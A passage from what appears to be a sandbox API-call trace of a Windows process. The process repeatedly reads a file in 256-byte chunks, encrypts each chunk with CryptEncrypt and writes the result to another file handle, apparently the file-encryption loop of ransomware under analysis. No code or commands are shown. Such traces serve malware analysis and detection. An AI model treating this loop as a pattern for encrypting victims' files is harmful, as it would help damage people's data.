lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.262] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.262] GetLastError () returned 0x0 [0168.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.262] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.262] GetLastError () returned 0x0 [0168.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.262] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.262] GetLastError () returned 0x0 [0168.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.262] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.262] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.262] GetLastError () returned 0x0 [0168.262] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.263] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.263] GetLastError () returned 0x0 [0168.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.263] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.263] GetLastError () returned 0x0 [0168.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.263] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.263] GetLastError () returned 0x0 [0168.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.263] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.263] GetLastError () returned 0x0 [0168.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.263] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.263] GetLastError () returned 0x0 [0168.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.263] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.263] GetLastError () returned 0x0 [0168.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.264] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.264] GetLastError () returned 0x0 [0168.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.264] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.264] GetLastError () returned 0x0 [0168.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.264] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.264] GetLastError () returned 0x0 [0168.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.264] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.264] GetLastError () returned 0x0 [0168.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.264] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.264] GetLastError () returned 0x0 [0168.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.264] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.264] GetLastError () returned 0x0 [0168.264] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.264] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.265] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.265] GetLastError () returned 0x0 [0168.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.265] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.265] GetLastError () returned 0x0 [0168.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.265] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.265] GetLastError () returned 0x0 [0168.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.265] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.265] GetLastError () returned 0x0 [0168.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.265] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.265] GetLastError () returned 0x0 [0168.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.265] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.265] GetLastError () returned 0x0 [0168.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.265] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.265] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.265] GetLastError () returned 0x0 [0168.265] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.266] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.266] GetLastError () returned 0x0 [0168.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.266] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.266] GetLastError () returned 0x0 [0168.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.266] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.266] GetLastError () returned 0x0 [0168.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.266] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.266] GetLastError () returned 0x0 [0168.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.266] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.266] GetLastError () returned 0x0 [0168.266] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.266] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.266] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.266] GetLastError () returned 0x0 [0168.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.267] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.267] GetLastError () returned 0x0 [0168.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.267] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.267] GetLastError () returned 0x0 [0168.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.267] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0168.267] GetLastError () returned 0x0 [0168.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0168.267] ReadFile (in: 